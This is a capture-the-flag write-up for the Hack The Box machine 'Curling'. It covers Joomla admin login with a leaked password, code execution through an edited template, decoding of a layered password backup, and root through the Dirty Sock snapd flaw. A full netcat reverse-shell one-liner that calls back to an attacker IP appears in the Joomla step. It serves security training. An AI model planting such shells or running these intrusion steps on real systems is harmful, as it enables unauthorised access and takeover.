Machine: Curling
OS: Linux
IP: 10.10.10.150

As usual I start with a normal port scan, which shows only two open ports: 22 (SSH) and 80 (HTTP).

Next we enumerate the web server on port 80, since it may expose directories we don't know about upfront.


We can look for files as well.


This secret file contains a base64-encoded string.

Decoding it gives the password 'Curling2018!'.


With this password and the username shown in one of the first posts on the site, you can log in to the Joomla administrator interface.

First I tried to create a new article and put a PHP reverse shell in it (the standard mkfifo/netcat one-liner, shown here in full; the page only preserved its tail):
<?php exec("rm /tmp/o;mkfifo /tmp/o;cat /tmp/o|/bin/sh -i 2>&1|nc 10.10.15.227 1234 >/tmp/o"); ?>

However this didn't seem to work (Joomla stores article bodies as HTML and never executes PHP inside them), so I decided to edit a less important template file instead, such as error.php, which is executed server-side.

As you can imagine, it would have been too easy to get the user shell so fast: the reverse shell lands as the web server's account, not as the user who owns the flag.

Have a look around and you will notice a file called password_backup which is a hexdump, so we need to reverse it with xxd -r and then decode the result.


After decoding it once you notice it's not done and you need to perform a series of decodings. I have to admit, this took more than 15 minutes to troubleshoot because the extensions were not added automatically and caused me a bit of confusion. Checking each intermediate result with file, and decompressing through stdin (bzip2 -dc, gzip -dc) so the tools don't depend on a file extension, avoids that.
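The chain above, as an added example that is not part of the original write-up: a small Python script that does what xxd -r plus the repeated decompressions do, but picks each layer by its magic bytes instead of by file extension, which is exactly the detail that cost the extra minutes. The dump it parses is constructed inside the script (a password.txt inside a tar, wrapped in bzip2, gzip and bzip2 again, then rendered as an xxd dump) and carries a placeholder string, not the machine's real password; that layer order is an assumption for the sample, not a claim about the real password_backup file.

```python
"""Added example (not from the original write-up): reverse an xxd hexdump and
peel nested compression layers by magic bytes, so the chain works even when
the intermediate files carry no extension. The sample dump is constructed
here and holds a placeholder, not the box's real password."""
import bz2
import gzip
import io
import lzma
import tarfile


def parse_xxd(dump: str) -> bytes:
    """Reverse an `xxd` hexdump ('offset: hex groups  ascii') into raw bytes,
    the same job as `xxd -r`."""
    out = bytearray()
    for line in dump.splitlines():
        if ":" not in line:
            continue                                  # blank or non-dump line
        _, rest = line.split(":", 1)                  # drop the offset column
        hex_part = rest.strip().split("  ")[0]        # ASCII column follows two spaces
        out += bytes.fromhex(hex_part.replace(" ", ""))
    return bytes(out)


def layer_type(data: bytes) -> str:
    """Identify a layer by magic bytes (what `file` would tell you)."""
    if data[:3] == b"BZh":
        return "bzip2"
    if data[:2] == b"\x1f\x8b":
        return "gzip"
    if data[:6] == b"\xfd7zXZ\x00":
        return "xz"
    if len(data) > 262 and data[257:262] == b"ustar":
        return "tar"
    return "raw"


def unwrap(data: bytes, max_layers: int = 10):
    """Strip layers until plain data remains. Returns (layers, payload); for a
    tar layer the first regular member is taken and its name is recorded."""
    layers = []
    for _ in range(max_layers):
        kind = layer_type(data)
        if kind == "raw":
            break
        if kind == "bzip2":
            data = bz2.decompress(data)
        elif kind == "gzip":
            data = gzip.decompress(data)
        elif kind == "xz":
            data = lzma.decompress(data)
        else:  # tar
            with tarfile.open(fileobj=io.BytesIO(data)) as tf:
                files = [m for m in tf.getmembers() if m.isfile()]
                if not files:
                    break
                kind = f"tar:{files[0].name}"
                data = tf.extractfile(files[0]).read()
        layers.append(kind)
    return layers, data


def to_xxd(data: bytes) -> str:
    """Render bytes in xxd's default 16-byte layout; only used for the sample."""
    lines = []
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        groups = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        ascii_col = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}: {groups:<39}  {ascii_col}")
    return "\n".join(lines) + "\n"


def build_sample_dump() -> str:
    """Constructed stand-in for password_backup: password.txt inside a tar,
    then bzip2 -> gzip -> bzip2, rendered as an xxd dump. The secret is a
    placeholder, not the machine's real password."""
    secret = b"not-the-real-password\n"
    tar_buf = io.BytesIO()
    with tarfile.open(fileobj=tar_buf, mode="w") as tf:
        info = tarfile.TarInfo("password.txt")
        info.size = len(secret)
        tf.addfile(info, io.BytesIO(secret))
    blob = bz2.compress(gzip.compress(bz2.compress(tar_buf.getvalue()), mtime=0))
    return to_xxd(blob)


if __name__ == "__main__":
    layers, plain = unwrap(parse_xxd(build_sample_dump()))
    print("layers peeled:", " -> ".join(layers))
    print("contents:", plain.decode().strip())
```

Run it with python3 and it prints the layers it peeled and the recovered contents; to use it on the box, feed the text of the real password_backup file to parse_xxd instead of the constructed sample.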


Then SSH access is granted as floris with the recovered password 5d



User flag caught.
User to root was much easier than expected, as can be seen:


Another way to root the box is the CVE route.
If you are doing this in 2019 and aware of CVE-2019-7304 (Dirty Sock):
What is it about? A bug in the local API of snapd, a service that comes by default with an Ubuntu installation, which lets a local user pass a fake uid to the API socket. You can read about it here: https://initblog.com/2019/dirty-sock/
Get the exploit from GitHub: https://github.com/initstring/dirty_sock
Check the installed version first with snap version: snapd 2.28 through 2.37 are affected and 2.37.1 fixed it. Then run the exploit.
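To see what the bug actually is before running someone else's exploit, here is an added example that is neither the dirty_sock exploit nor snapd's source: a Python model of the uid-parsing flaw as the linked write-up describes it, an illustrative hardened parser (not the upstream patch), and a version check for the affected range. The address string layout (pid=;uid=;socket=; followed by the client's socket path) and the sample address are assumptions made for the illustration.

```python
"""Added example (not the dirty_sock exploit and not snapd's source): a model
of the CVE-2019-7304 parsing flaw as described in the linked write-up, an
illustrative hardened variant, and a check for the affected snapd range."""
import re


def parse_peer_vulnerable(remote_addr: str) -> dict:
    """Model of the vulnerable behaviour: the daemon builds a string of the
    form 'pid=<n>;uid=<n>;socket=<server path>;<client socket path>' from the
    kernel-supplied peer credentials and then splits the whole thing on ';',
    so a 'uid=' token smuggled inside the client's socket path overrides the
    real uid. Layout assumed from the write-up, not copied from snapd."""
    creds = {"pid": None, "uid": None, "socket": None}
    for token in remote_addr.split(";"):
        if token.startswith("pid="):
            creds["pid"] = int(token[4:])
        elif token.startswith("uid="):
            creds["uid"] = int(token[4:])
        elif token.startswith("socket="):
            creds["socket"] = token[7:]
    return creds


def parse_peer_hardened(remote_addr: str) -> dict:
    """Illustrative fix (not upstream's patch): only the first pid= and uid=
    tokens count, and scanning stops at socket=, because everything after it
    is the peer-chosen path and must be treated as untrusted data."""
    creds = {"pid": None, "uid": None, "socket": None}
    for token in remote_addr.split(";"):
        if token.startswith("pid=") and creds["pid"] is None:
            creds["pid"] = int(token[4:])
        elif token.startswith("uid=") and creds["uid"] is None:
            creds["uid"] = int(token[4:])
        elif token.startswith("socket="):
            creds["socket"] = token[7:]
            break
    return creds


def snapd_is_vulnerable(version: str) -> bool:
    """CVE-2019-7304 affects snapd 2.28 through 2.37; 2.37.1 fixed it.
    Accepts the `snap version` form such as '2.37.4+18.04.1'."""
    m = re.match(r"(\d+(?:\.\d+)*)", version)
    if not m:
        raise ValueError(f"unrecognised snapd version: {version!r}")
    parts = tuple(int(p) for p in m.group(1).split("."))
    return (2, 28) <= parts < (2, 37, 1)


if __name__ == "__main__":
    # Constructed address: the kernel reports uid 1000, but the client bound
    # its socket to a path that contains ';uid=0;'.
    addr = "pid=4242;uid=1000;socket=/run/snapd.socket;/tmp/sock;uid=0;"
    print("vulnerable parser sees uid:", parse_peer_vulnerable(addr)["uid"])
    print("hardened parser sees uid:  ", parse_peer_hardened(addr)["uid"])
    for v in ("2.34.2+18.04", "2.37.4+18.04.1"):
        print(v, "->", "vulnerable" if snapd_is_vulnerable(v) else "patched")
```

The point to take away is the trust boundary: the pid and uid come from the kernel, the socket path comes from the peer, and concatenating both into one string before parsing is what let the peer-controlled part speak for the kernel.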

I hope you enjoyed the write-up and it didn't make you waste time. Drop me a cup of coffee for Sundays ( https://ko-fi.com/y2xhcmtrzw50 ) or email me at kryptoniteclark@protonmail.com :)